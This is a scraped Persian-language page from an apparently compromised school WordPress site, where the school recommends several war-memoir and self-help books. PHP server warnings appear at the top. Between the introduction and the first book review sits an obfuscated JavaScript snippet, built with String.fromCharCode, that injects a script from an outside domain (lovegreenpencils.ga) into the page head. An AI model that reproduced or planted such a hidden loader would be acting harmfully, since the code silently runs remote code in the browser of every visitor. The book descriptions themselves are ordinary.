Warning: A non-numeric value encountered in /home/ghalamsc/public_html/wp-content/plugins/litespeed-cache/litespeed-cache.php on line 58

Warning: array_merge(): Expected parameter 1 to be an array, null given in /home/ghalamsc/public_html/wp-includes/blocks/shortcode.php on line 31

Warning: array_merge(): Expected parameter 1 to be an array, null given in /home/ghalamsc/public_html/wp-includes/blocks/social-link.php on line 45

Warning: Cannot modify header information - headers already sent by (output started at /home/ghalamsc/public_html/index.php:1) in /home/ghalamsc/public_html/wp-content/plugins/LayerSlider/assets/classes/class.ls.popups.php on line 190

Warning: Cannot modify header information - headers already sent by (output started at /home/ghalamsc/public_html/index.php:1) in /home/ghalamsc/public_html/wp-content/plugins/LayerSlider/assets/classes/class.ls.popups.php on line 197

Warning: Cannot modify header information - headers already sent by (output started at /home/ghalamsc/public_html/index.php:1) in /home/ghalamsc/public_html/wp-content/plugins/post-views-counter/includes/counter.php on line 294
معرفی کتاب -

کتاب و کتابخوانی یکی از مهمترین اصل های ، زندگی موفق هستند . معرفی کتاب خوب و آموزنده می تواند مسیر زندگی یک فرد را تغییر دهد .

معاونت پرورشی و تربیتی مدرسه در نظر دارد با هدف ایجاد انگیزه مطالعه در بین دانش آموزان و در جهت غنی سازی مطالعه ، کتابهایی را به عنوان نمونه خدمتتان معرفی نماید .

شما می توانید با کلیک بر روی « اینجا » از سایر فعالیت های معاونت پرورشی دیدن کنید

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

معرفی کتاب «سلام بر ابراهیم»

کتابی است که در قالب زندگینامه ای مختصر و ۶۹ خاطره درباره شهید بزرگوار و مفقود الاثر «ابراهیم هادی» منتشر شده است.

این نوشتار حاصل بیش از پنجاه مصاحبه از خانواده، یاران و دوستان آن شهید است که همگی نگارنده را در گردآوری این مجموعه ارزشمند یاری رساندند.

شهید هادی در یکم اردیبهشت ماه سال ۳۶ دیده به جهان گشود و پس از بیست و هفت سال زندگی پر فراز و نشیب، در عملیات والفجر مقدمّاتی در منطقه فکه، بیست و دوم بهمن سال ۶۱ به درجه رفیع شهادت نائل آمدند .

پیکر پاک ابراهیم در کربلای فکه گمنام ماند همانطور که از خداوند می خواست،.

یک بخش از کتاب :

یک ماه از مفقود شدن ابراهیم می گذشت. بچّه هایی که با ابراهیم رفیق بودند هیچ کدام حال و روز خوبی نداشتند. هر جا جمع می شدیم از ابراهیم می گفتیم و اشک می ریختیم.
برای دیدن یکی از بچّه ها به بیمارستان رفتیم، رضا گودینی هم اونجا بود. وقتی که رضا رو دیدم انگار که داغش تازه شده باشه بلند گریه می کرد.

بعد گفت: “بچّه ها دنیا بدون ابراهیم برا من جای زندگی نیست. مطمئن باشید من تو اولّین عملیات شهید می شم.”
یکی دیگه از بچّه ها گفت: “ما نفهمیدیم ابراهیم کی بود. اون بنده خالص خدا بود که اومد بین ما و مدّتی باهاش زندگی کردیم تا بفهمیم معنی بنده خالص خدا بودن چیه” یکی دیگه گفت: “ابراهیم به تمام معنا یه پهلوان بود یه عارف پهلوان”
سایت مرجع

 

ابراهیم هادی

معرفی کتاب «خاک های نرم کوشک»

خاطرات اوستا عبدالحسین برونسی به نقل از خانواده و همرزمان شهید.

این کتاب شرح حال انسانی وارسته است که قبل از انقلاب در روستای گلبوی کدکن از توابع تربت حیدریه به کار سخت و طاقت فرسای بنایی مشغول بود
او در کنار بنایی به خواندن دروس حوزوی نیز روی آورده بود تا اینکه بعدها به علت شدت یافتن مبارزات او زندانی و مورد شکنجههای وحشیانه ساواک قرار گرفت.
با پیروزی انقلاب اسلامی در ایران زمینه های لازم برای رشد او مهیا شد چنان لیاقتی از خود نشان داد که زبانزد همگان شد و نامش حتی در محافل خبری استکبار جهانی نیز راه یافت.
رمز رستگاری شهید برونسی عبودیت و بندگی بی قید و شرط او در مقابل حق و حقیقت بوده است.

از این کتاب به عنوان پرتیراژ ترین کتاب دفاع مقدس نام برده می شود
سایت مرجع

 

خاک های نرم کوشک

معرفی کتاب « سه دقیقه در قیامت »

این کتاب روایتی است از خاطرات یکی از مدافعان حرم که در جریان عمل جراحی برای لحظاتی از دنیا می رود و سپس با شوک در اتاق عمل، دوباره به زندگی برمی گردد؛ اما در همین زمان کوتاه چیزهایی دیده که درک آن برای افراد عادی سخت است.

از دیدگاه قرآن و روایات، برزخ و قبر یک چیز است که گاهی از آن به عالم قبر و گاهی از آن به عالم برزخ یاد می شود. برزخ در لغت یعنی چیزی که حایل بین چیزی و چیز دیگر باشد.

ازاین رو به جهانی که میان دنیا و آخرت واقع می شود برزخ اطلاق می گردد

برزخ قیام و زندگی جدید و جهانی نو است؛ خواه گودالی از گودالهای دوزخ باشد، یا باغی از باغهای بهشت.

پس برزخ معبر و دالان ورودی به قیامت و حشر اکبر است و انسان در ادامه ی مسیر زندگی دنیا وارد جهان برزخ می شود، که سراسر آگاهی و حیات است «النّاس نیام فإذا ماتوا انتبهوا»

قرآن کریم در آیاتی از جهان برزخ خبر داده است؛ مانند:
۱ـ «… و من ورائهم برزخ إلی یوم یبعثون :واز پس انان برزخی است ، تا روزی که مبعوث شوند»

این آیه حکایت می کند که ، بعد از مردن تا قیامت حالتی وجود دارد که آن حالت ،حائل و فاصله میان زندگی این دنیا و قیامت است.

کتاب حاضر مطالبی را در این باب ارائه می کند.

سه دقیقه در قیامت

معرفی کتاب «شما عظیم تر از آنی هستید که می اندیشید»

یک برگ توت در اثر تماس با نبوغ انسان به ابریشم تبدیل می‌شود. یک مشت خاک در اثر تماس با نبوغ انسان به قصری بدل می‌شود.

یک درخت سرو در اثر تماس با نبوغ انسان دگرگون می‌شود و شکل معبدی می‌گیرد.
یک رشته پشم گوسفند در اثر تماس با ابتکار انسان به صورت لباسی فاخر در می‌آید.
اگر در برگ، خاک،چوب و پشم این امکان هست که ارزش خود را از طریق انسان صد برابر بلکه هزار برابر کنند

آیا من نمی‌توانم با این بدن خاکی که نام مرا حمل می‌کند چنان کنم.

شما عظیم تر از آنی هستید که می اندیشید

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

این فیلد را پر کنید
این فیلد را پر کنید
لطفاً یک نشانی ایمیل معتبر بنویسید.
برای ادامه، شما باید با قوانین موافقت کنید

فهرست